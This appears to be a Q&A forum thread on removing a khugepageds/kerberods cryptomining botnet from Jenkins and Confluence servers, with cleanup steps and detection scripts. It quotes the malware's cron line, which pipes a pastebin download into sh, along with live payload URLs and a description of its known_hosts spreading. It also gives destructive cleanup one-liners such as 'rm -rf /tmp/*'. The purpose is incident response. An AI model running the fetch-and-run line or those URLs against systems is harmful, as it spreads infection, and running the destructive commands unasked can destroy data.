user3052526

Reputation: 681

Jenkins High CPU Usage Khugepageds

enter image description here

The picture above shows a process named khugepageds that uses 98 to 100% of the CPU at times.

I tried to find out how Jenkins uses this process and what to do about it, but was not successful.

I did the following:

When I pkill the process, the usage of course goes down, but after a restart it is back up again.

Has anyone had this issue before?

Upvotes: 19

Views: 7750

Answers (6)

FkJ

Reputation: 1634

In my case this was making builds fail randomly with the following error:

Maven JVM terminated unexpectedly with exit code 137

It took me a while to pay due attention to the khugepageds process, since everywhere I read about this error the suggested solution was to increase memory.

The problem was solved with @HeffZilla's solution.

Upvotes: 0

This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

Possible solution

  1. Do not run Confluence as root!
  2. Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
  3. Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
  4. Remove broken crontab: crontab -u <confluence_user> -r
  5. Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
    location /rest/tinymce/1/macro/preview {
        return 403;
    }
  6. Restart Confluence.

The exploit

The exploit contains two parts: a shell script from https://pastebin.com/raw/xmxHzu5P and an x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg

The script first kills all other known trojans, viruses and botnet agents, then downloads the binary and spawns it from /tmp/kerberods, and finally iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.

The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I still haven't examined what it does. It looks like a botnet controller.
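To check quickly whether the files named in this thread are present, something like the sketch below may help. It only looks for /tmp/kerberods and /tmp/.X11unix (the PID file read by the kill command above); the function name and the optional root-directory argument are my own, and a clean result does not prove the machine is clean. Note that the regular X11 socket directory is /tmp/.X11-unix, with a hyphen, and is not what this looks for.

```shell
#!/bin/sh
# Report the artifacts mentioned in this thread, if they exist.
# The optional argument is a hypothetical root directory (default "/"),
# so the check can be pointed at a mounted disk image or a test directory.
check_indicators() {
    root="${1:-/}"
    found=0
    for path in tmp/kerberods tmp/.X11unix; do
        if [ -e "${root%/}/$path" ]; then
            echo "found: ${root%/}/$path"
            found=1
        fi
    done
    # Exit status 0 when at least one artifact was found, 1 otherwise.
    [ "$found" -eq 1 ]
}
```

Call it as `check_indicators` on the live system, or `check_indicators /mnt/image` against a mounted copy.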

Upvotes: 10

HeffZilla

Reputation: 306

So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill the process (and keep it killed) by running the following command:

rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;

Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.

NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).

Upvotes: 19

Tony

Reputation: 1

Because the cron file just gets recreated, a solution that works is to empty jenkins' cron file. I also changed its ownership and made the file immutable.

This finally stopped the process from kicking in.
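As a rough sketch of those three steps: the function below only prints the commands so they can be reviewed first. The crontab path is an assumption (Debian/Ubuntu typically use /var/spool/cron/crontabs/<user>, RHEL/CentOS /var/spool/cron/<user>), and handing ownership to root is also my assumption, since the answer does not say who the new owner was. The function name is made up.

```shell
#!/bin/sh
# Print (do not run) the commands for emptying and locking a user's crontab.
# The default path is an assumption; pass the real path as the first argument.
lock_crontab_plan() {
    file="${1:-/var/spool/cron/crontabs/jenkins}"
    echo ": > $file"              # truncate the crontab to zero length
    echo "chown root:root $file"  # assumed new owner: root
    echo "chattr +i $file"        # set the immutable attribute (undo with chattr -i)
}
```

Review the output, then run the lines as root. `chattr +i` needs a filesystem that supports the immutable attribute.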

Upvotes: 0

MalhotraVijay

Reputation: 101

Yes, we were also hit by this vulnerability. Thanks to pittss's answer we were able to find out a bit more about it.

You should check /var/log/syslog for the curl pastebin script, which seems to start a cron job on the system. It will try again to gain access to the /tmp folder and install unwanted packages/scripts.

You should remove everything from the /tmp folder, stop Jenkins, check the cron jobs and remove any that seem suspicious, then restart the VM.

The exploit places an unwanted executable in the /tmp folder and tries to access the VM via SSH. It also adds a cron job to your system, so be sure to remove that as well.

Also check the ~/.ssh folder for known_hosts and authorized_keys for any suspicious ssh public keys. The attacker can add their ssh keys to get access to your system.
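For the authorized_keys review, a small helper like this lists only the active entries with their line numbers, so each key can be checked by hand. It is a minimal sketch: the function name is made up, and it does not decide which keys are suspicious.

```shell
#!/bin/sh
# List non-blank, non-comment entries of an authorized_keys file,
# each prefixed with its line number.
list_key_entries() {
    file="${1:-$HOME/.ssh/authorized_keys}"
    [ -r "$file" ] || { echo "cannot read $file" >&2; return 1; }
    # grep exits with status 1 when the file has no active entries.
    grep -nEv '^[[:space:]]*(#|$)' "$file"
}
```

Run it for every account that can log in, for example `list_key_entries /root/.ssh/authorized_keys`.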

Hope this helps.

Upvotes: 10

pittss

Reputation: 61

It seems like a vulnerability. Try looking in syslog (/var/log/syslog, not the Jenkins log) for an entry like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
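A grep along these lines can do that search. It is only a sketch: the pattern is derived from the entry quoted above, the function name is made up, and the default log path is the one named here (other distributions may log cron elsewhere).

```shell
#!/bin/sh
# Print log lines where cron ran a curl/wget download from pastebin.com.
# The first argument is the log file (default: /var/log/syslog).
find_pastebin_cron() {
    log="${1:-/var/log/syslog}"
    grep -E 'CRON.*CMD.*(curl|wget).*pastebin\.com/raw/' "$log"
}
```

No output (exit status 1) means no matching line in that file. Rotated logs such as /var/log/syslog.1 would need to be checked separately.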

If you find one, stop Jenkins, clear the /tmp directory and kill all processes started by the jenkins user.

If the CPU usage then goes down, update Jenkins to the latest LTS version. Then, after starting Jenkins, update all of its plugins.

Upvotes: 6
